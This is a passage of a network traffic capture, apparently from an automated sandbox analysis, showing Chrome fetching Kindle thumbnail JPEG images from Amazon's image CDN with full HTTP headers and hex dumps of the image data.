                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1069INData Raw: b3 4d 5e c4 1a a9 48 03 41 71 dc 37 b8 90 27 af 52 bc ac 9a f8 f9 64 b4 52 50 75 08 4c 08 92 20 40 8d 75 e9 f9 b2 83 77 1b 35 5c f9 ba 76 37 8e 37 ea ff 00 91 75 0a 48 f1 3a 1d a7 f5 f9 b9 39 91 fb 22 c3 dc db 31 cb ef 87 3b 2d 12 85 a6 7c 7e 19 4f 74 e8 2b 51 bd cf 4e 8c ce cc ee 97 4d ee 96 0b 5d fc f6 f7 2a 55 27 52 77 3e fa dc 7b 1e b8 3f 8a 5c ab ae ee fd f3 bf e1 ee 89 34 0d 33 3d b0 00 23 f0 13 1f 5f 03 db ab 0c 5e b6 36 df 5e c9 9a a1 53 39 4f dd ef d8 a4 1e e4 91 3a 99 0a 10 a9 00 83 1e 44 75 7f 8d 5e f6 ff 00 09 66 53 71 11 10 8b b1 1f d2 3e 91 b3 f4 8d 78 8e 87 05 fc 7d e2 d5 c3 29 25 c1 00 ca a5 46 06 c1 dc 92 4f e7 20 90 4f 4c 6c 76 18 eb 75 b3 4b 5a 0d 3b 3a 33 da 26 63 43 f3 88 dc 7c ef 5c 77 8d bd 39 db 3c 5c 37 83 78 88 24 eb 67 5e 75 e7
                                                                                                                                                                                                                                                                Data Ascii: M^HAq7'RdRPuL @uw5\v77uH:9"1;-|~Ot+QNM]*U'Rw>{?\43=#_^6^S9O:Du^fSq>x})%FO OLlvuKZ;:3&cC|\w9<\7x$g^u


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                86192.168.2.449950151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2140
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 677931a3-8039-4180-9ec7-dbbf52a1ef70
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Sep 2021 13:15:55 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 26 Aug 2043 21:30:20 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 2236685
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:33 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100051-IAD, cache-nyc-kteb1890027-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 01 02 03 04 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 af 0b 0d c4 b6 11 d3 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC762INData Raw: 21 8e 40 ea 86 d6 84 20 b6 89 bd e2 86 fd 39 b6 0a f8 dd 30 cc fa f3 96 91 3e a4 e9 e8 06 2a 4e 07 09 70 be a7 16 a3 a6 f0 0f b3 b2 2d 71 ba 27 cb 18 20 dd 75 63 d2 ea 3e b7 75 31 94 4c 13 3d 56 9b 76 7e 99 2a e2 e6 5d 6c 21 d4 29 5b c5 04 8b 02 22 77 26 39 45 75 f2 b6 a8 56 4d 80 b1 71 b3 1e b5 59 46 fe 5e 6f e9 6f d2 8f 5a dc a5 77 a8 49 4f 52 9b 8c 11 82 ea d2 d4 99 96 ea 3b 84 83 c6 60 90 ca d6 16 4a 33 12 02 ae 93 0c 61 60 94 20 2a 71 a7 09 bd ca 15 a2 25 b0 eb cc 38 14 cc d2 40 3a 17 7b 1b 8f 82 13 46 9d 05 76 9c 6e c4 71 66 a7 ec 87 b0 a8 b6 f9 f1 6e b8 77 06 2b 3d b7 53 50 97 43 60 83 67 23 0f d2 93 4d 13 77 9b 6d e5 bc b0 b5 14 0b 01 cc 48 89 da 2d 2a 78 de 6a 4d b7 4f 10 2a 1a 61 38 47 0f 20 59 12 45 1f 15 d7 13 e4 30 70 b5 17 f8 2f 7f d0 f7 a5
                                                                                                                                                                                                                                                                Data Ascii: !@ 90>*Np-q' uc>u1L=Vv~*]l!)["w&9EuVMqYF^ooZwIOR;`J3a` *q%8@:{Fvnqfnw+=SPC`g#MwmH-*xjMO*a8G YE0p/


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                87192.168.2.449952151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3095
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f6315f65-4ea2-4927-9fa4-9bd039da565c
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 28 Aug 2043 19:18:42 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1465366
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:33 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000119-IAD, cache-nyc-kteb1890048-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 07 08 09 06 05 04 01 03 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d4 00 00 00 00 1f 94 4e db da 24 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"2N$
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: 17 b7 2c 65 50 64 9d 0e cd 64 7c b6 92 2a 85 22 b6 3a 93 fc 17 99 af 60 59 97 ab 31 81 b1 90 6e 48 b9 f2 75 9a 3a 74 cf de a2 98 42 48 6f 09 d4 af 28 42 bb 8f 8e 2e 05 b7 1b 77 62 aa 39 3a 59 95 46 be 12 ca 40 15 b0 df 48 a9 50 36 bd c6 97 03 65 6b 70 0c be 4c e5 32 ec a6 8e 5a c9 b4 f8 cc a8 85 b4 af 7b 1b 58 0e 64 81 82 06 7d 9d 54 55 e6 55 32 27 1e b2 57 eb 24 df 88 bb 39 fb f1 2e 8c e7 26 94 d4 53 a1 6d 2b 53 17 f7 b4 ef de ae b7 1e 82 41 1b 81 89 0c 99 6e 6b 4c 95 30 eb d9 96 e3 74 61 c9 94 dd 48 e4 54 fe ca 9a 7a b9 e8 9b 45 44 2a 6e d1 b5 81 37 17 1e 70 07 b8 ed c7 14 54 cc b6 b9 69 15 85 bd 7d ac 66 14 35 d3 52 56 cd 41 58 94 12 6a 58 26 8d 88 d2 77 27 71 a5 81 bd 88 60 47 90 c8 61 cb b3 0c e6 9e 1a f7 b1 b1 89 15 e6 55 24 70 bc 91 47 c7 8d ad cf
                                                                                                                                                                                                                                                                Data Ascii: ,ePdd|*":`Y1nHu:tBHo(B.wb9:YF@HP6ekpL2Z{Xd}TUU2'W$9.&Sm+SAnkL0taHTzED*n7pTi}f5RVAXjX&w'q`GaU$pG
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC339INData Raw: 22 36 fe 7e 38 2e 76 8d 6f 49 8c fe 9f 26 e5 54 8d d4 73 c5 1a 55 43 7b 98 e5 24 a9 f5 8e 07 19 0e 5b 11 fa 34 a9 fa 62 14 89 47 24 50 07 f4 60 49 d0 f1 57 17 18 c8 68 a5 20 df b5 1e 3a 3d 46 59 78 5a 2d 47 ef c7 c1 66 71 d2 6c 8a be 82 2a 7a 3a cc 91 24 69 10 21 93 b0 d0 88 9b 71 ac 58 86 b1 03 97 01 f0 25 f0 80 16 46 6d 2b 3e 4b 3c 63 7f a5 d5 9b 63 27 9b 21 cd 33 ec cb c2 93 2c 97 b4 f4 f0 aa d9 7a c6 1b 6a 24 b6 c3 80 b7 3e 1e 5d ff c4 00 22 11 00 02 01 03 04 02 03 00 00 00 00 00 00 00 00 00 00 01 02 11 30 31 03 10 12 20 13 41 21 40 51 ff da 00 08 01 02 01 01 3f 00 eb 4a dc 8a 1a b7 a6 aa 89 47 6f 8f 56 74 b2 c9 60 6a d6 96 49 3d a5 da 95 38 b1 40 72 4b 05 6a 4f d3 25 d9 49 24 79 1f e0 e4 e5 9d 94 a8 72 25 f4 3f ff c4 00 22 11 01 00 01 02 06 02 03 00
                                                                                                                                                                                                                                                                Data Ascii: "6~8.voI&TsUC{$[4bG$P`IWh :=FYxZ-Gfql*z:$i!qX%Fm+>K<cc'!3,zj$>]"01 A!@Q?JGoVt`jI=8@rKjO%I$yr%?"


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                88192.168.2.449954151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3097
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 846011c0-086e-4064-8741-ae5e15c3922e
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sun, 02 Aug 2043 11:07:08 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:33 GMT
                                                                                                                                                                                                                                                                Age: 3465450
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100037-IAD, cache-ewr18141-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 07 04 06 08 03 02 09 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 18 d8 7c d5 44 9f a3 7e b5
                                                                                                                                                                                                                                                                Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5|D~
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: 09 6b 7a 56 01 3e 49 e8 6a 3b 2e b1 ab f4 bb 0e ab 2b 46 9b 58 57 4c 75 dc 3c 32 7e 8e 25 5a ae b6 9b e3 da 8a 04 5e 7b 32 a2 29 99 40 a4 ad 23 70 09 5e e0 3b 85 0a 77 5a ce 53 2d a3 2d e5 a9 4b 7d 0e 25 d5 27 0b 56 3b 81 e5 8e 95 c2 ad 3b 74 bb 5e 62 ea 8b 9c 44 47 66 1c 11 1a 10 08 2d f3 97 d4 17 b6 fd 0c fb a7 e7 ed ad 37 b4 5a 2d 57 a5 97 0a 0b d7 97 90 95 e3 3b 48 19 a4 eb 69 64 82 e5 e9 04 61 1d 03 3e 20 7a dd fc 0d 2f 59 cf 09 51 17 8d 89 21 5b 49 63 b1 38 db 47 5b bd e1 78 e9 bf 3d 5a eb b7 3d a9 9b 82 6e 5a f2 c9 29 03 a3 96 27 bf 73 b8 a5 64 1d b8 eb 8c e2 a5 dc 6d f0 cb 69 99 29 a6 79 99 d8 1c 3e f6 08 1d 3f 5d 3a c7 0f 5f 92 24 a9 ab 4a dd 2a 03 72 50 93 95 1f c2 2a 1d c6 dd 30 38 88 52 59 78 34 13 bc 34 ac 84 6e ed 43 25 5b 40 39 c6 71 4d 02
                                                                                                                                                                                                                                                                Data Ascii: kzV>Ij;.+FXWLu<2~%Z^{2)@#p^;wZS--K}%'V;;t^bDGf-7Z-W;Hida> z/YQ![Ic8G[x=Z=nZ)'sdmi)y>?]:_$J*rP*08RYx44nC%[@9qM
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC341INData Raw: 00 00 00 00 00 00 00 01 02 03 00 04 11 05 12 21 06 13 31 30 41 51 20 22 40 52 71 72 81 91 ff da 00 08 01 03 01 01 3f 00 f5 dd d1 17 73 b0 51 f2 4e 2a f3 a9 23 80 37 65 22 97 0f 81 f7 11 c6 3c d5 9d fd bd da 29 49 63 2f 80 59 15 b3 83 e9 5d 9d fa a6 d6 27 11 da 77 10 7c 31 24 66 ae ef 1a 3b a9 63 04 6d 56 e0 56 88 12 e2 6e e7 22 44 75 da ca 70 45 45 33 3b 30 31 95 00 79 a0 41 f0 7d 0d 4e ca 1b ab ab 34 72 cb 9d e0 b2 1c 36 00 ce 29 ba 4b 48 62 4b 77 89 fe 55 0f 4f 58 58 cf 04 d0 19 72 25 1c 16 c8 34 fe 29 79 3e 86 ad 73 2d ab db 4f 12 a9 74 de 54 30 c8 24 e0 54 3d 45 ac 48 92 96 8e c5 36 2e e2 0a 7b 7f b5 61 af de 6a 33 84 9e 28 15 50 6f 1d b4 da 73 90 28 48 a4 79 a0 47 c8 a0 c0 9c 7d 7a a1 79 af 92 dd 59 57 10 6e 04 a8 71 97 38 e4 1f da af 2e 26 b6 9c c2
                                                                                                                                                                                                                                                                Data Ascii: !10AQ "@Rqr?sQN*#7e"<)Ic/Y]'w|1$f;cmVVn"DupEE3;01yA}N4r6)KHbKwUOXXr%4)y>s-OtT0$T=EH6.{aj3(Pos(HyG}zyYWnq8.&


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                89192.168.2.449956151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4015
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 5f060a93-ca57-4828-95da-ed9a000ed89f
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 26 Aug 2043 21:30:19 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 2179331
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:33 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000055-IAD, cache-ewr18128-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 8f 12 16 9f dc d8 b5 7a 72
                                                                                                                                                                                                                                                                Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5zr
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1378INData Raw: 23 6d 6e 1e af f5 0c b5 d0 76 df 0d 8d 1b d2 2c a5 d5 b6 13 70 97 33 07 59 4e 74 83 53 4b 55 56 f9 09 06 33 46 90 9f f9 ed 7a fb 79 9e 34 6b 8c 8a 31 3b f4 10 30 f8 91 9b d4 6d d4 9c 7c a8 df a1 ca ba 9b 59 34 4e 56 a3 de 89 5d 5f 2d ea c4 73 9c 9a 83 5e 95 37 50 e5 1d dd 80 09 55 cd 99 24 86 73 5f 1e d5 59 20 26 6c 45 62 11 f5 f9 42 47 e8 e9 e2 79 83 03 27 40 27 4b 31 88 a2 95 19 d5 28 16 90 6d 9a f9 d5 8e 74 74 04 36 35 66 48 09 cc 54 14 74 10 a0 cb 07 cc b5 61 f1 99 df da c8 65 ac 49 21 27 87 dd 22 4d 9d 28 4a 46 44 0f 01 74 e7 b8 2d 24 21 a3 64 52 06 4f af 5d 03 1b 63 15 3d 35 9b 05 63 48 a2 63 17 aa b2 74 8e dc 39 ad 72 5b cb 20 a8 0d 3f ca 3f ad a5 9d c0 ca fe e3 b2 62 41 97 64 d3 45 46 1a d4 ba ae b4 c8 bc 80 d8 c0 58 bb 5e 7e ef a4 75 70 2c 5a 8f
                                                                                                                                                                                                                                                                Data Ascii: #mnv,p3YNtSKUV3Fzy4k1;0m|Y4NV]_-s^7PU$s_Y &lEbBGy'@'K1(mtt65fHTtaeI!'"M(JFDt-$!dRO]c=5cHct9r[ ??bAdEFX^~up,Z
                                                                                                                                                                                                                                                                2024-08-12 13:23:33 UTC1259INData Raw: 10 6a 78 3c 01 0a 38 cc 02 c1 89 24 57 c7 b5 74 07 52 f4 24 55 82 42 ea c0 a5 85 de ec 68 85 12 3e 4c c5 f1 e5 f6 a8 cd f9 1f 2d 34 68 19 bf d6 d5 d4 f3 26 85 6f b5 1b 03 ec 15 a8 8d 8e 18 5d 8b 26 dc fa 53 2a 88 60 58 31 68 c8 e6 4b e5 c5 7a bb f8 6d 81 40 aa 7e c0 3d ca f5 3d 6b 16 01 d3 81 3d 2c b4 02 da 56 1e 22 ed ce cb b7 3a c1 47 d6 5a 11 28 1d c8 42 45 09 01 94 78 40 89 16 d6 20 6f b5 2a 90 02 ad bd a4 91 5e 39 e1 be e7 63 e5 e1 66 e7 b0 b9 df 60 6b 2b 2f ed 4e ff 00 7a 82 29 80 f1 18 4a 0e 07 a8 02 db fd 21 27 ff 00 85 01 c4 6d 62 05 2c 6c 62 8a e3 39 ed db da 68 5d 48 cd 58 12 77 1b 81 fb bd aa 55 52 c5 30 21 6e d6 df 21 c8 5c 52 33 97 64 68 c3 25 b8 4a 39 28 32 ee a5 6e 28 3b 17 84 ea 41 91 54 b9 07 8d 45 98 81 c4 3b 8b 01 49 a4 26 1d 4e a1 cc
                                                                                                                                                                                                                                                                Data Ascii: jx<8$WtR$UBh>L-4h&o]&S*`X1hKzm@~==k=,V":GZ(BEx@ o*^9cf`k+/Nz)J!'mb,lb9h]HXwUR0!n!\R3dh%J9(2n(;ATE;I&N


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                90192.168.2.449958151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
